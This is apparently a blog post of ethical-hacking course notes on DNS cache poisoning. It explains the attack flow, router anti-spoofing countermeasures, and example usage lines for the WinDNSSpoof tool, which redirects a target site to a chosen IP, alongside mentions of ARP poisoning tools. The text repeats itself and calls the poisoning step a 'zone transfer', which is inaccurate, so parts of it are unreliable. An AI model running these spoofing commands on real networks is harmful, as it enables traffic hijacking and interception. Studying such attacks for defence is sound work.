-  
 DNS Spoofing is said to have occurred when a DNS entry points to another IP instead of the legitimate IP address.
-  
 When an attacker wants to poison a DNS cache, he will use a faulty DNS - which can be his own domain running a hacked DNS server. The DNS server is termed as hacked because the IP address records are manipulated to suit the attacker's needs.
| Concept | DNS  Spoofing is said to have occurred when a DNS entry  points to another IP  instead of the legitimate IP address. Let us see how this  is done. | 
Typically, a DNS Server contains the records only for  the machines  of the domain it has authority over. If it has to answer  queries about machines  outside its domain, it has to send a request to  the other DNS Server which  handles these machines. As frequent  communication is not practical, the DNS  server keeps a cache and stores  in it all the replies returned by other DNS  servers.
When an attacker wants to poison a DNS cache, he will use a  faulty  DNS - which can be his own domain running a hacked DNS server.  The DNS server is  termed as hacked because the IP address records are  manipulated to suit the  attacker's needs.
| Attack Methods | The attack  methodology goes like this. The attacker sends a  request to the target  DNS Server asking it to resolve www.attacker.com  (attacker's  domain). As the target DNS does not have the pointing  record in its cache, it  seeks the answer from the responsible name  server (which is the attacker's DNS  server). While replying to the  target DNS server, the hacked DNS server  transfers all the records,  including the manipulated records, to the target  server. This process  is called zone transfer. The DNS server is poisoned as long  as the  cache is not cleared or updated. This way, the attacker can make some   records point to spoofed addresses or even remain silent and let all the  traffic  pass through his server. | 
| Countermeasures | Countermeasures  include implementing much of the  anti-spoofing rules on the border  routers of network. This can be as simple as  not allowing anything out  with a source IP address not belonging to the network  or anything in  with a source IP address belonging to the  network. | 
The next level of protection can reside on the access  routers.  This could also be used in order to prevent IP spoofing at its  most common  source. While these filters can be sometimes tricky when  it comes to combining  dynamic IP and 'multi-POP' static IP routing, if  implemented well, these filters  can completely prevent IP spoofing that  originates from an access network.
-  
 This tool is a simple DNS ID Spoofer for Windows 9x/2K.
-  
 In order to use it you must be able to sniff traffic of the computer being attacked.
-  
 Usage: wds -hExample: wds -n www.microsoft.com -i 216.239.39.101 -9 00-00-39-5c-45-3b
| This is a simple tool for spoofing  the DNS ID for Windows  9x/2K. In order to use the user must be able to  sniff traffic of the computer  being attacked. However, it does not work  in a switched network, as a switched  network requires ARP Cache  Poisoning tools like winarp_sk or  winarp_mim. | 
A personal firewall must be configured to block UDP 53  destination  port to check outgoing DNS traffic in order to ensure that  the DNS Server does  not answer before WinDNSSpoof does. The working of  WinDNSSpoof then takes care  of spoofing only those packets that are  required to - while the rest are allow  to go through. This is made  possible by specifying the MAC address of the DNS  server or the default  gateway in case the DNS server is in another network.
Usage: wds -h
Example: wds -n  www.targetsite.com -i 216.239.39.101 -g  00-00-39-5c-45-3b
 
0 comments:
Post a Comment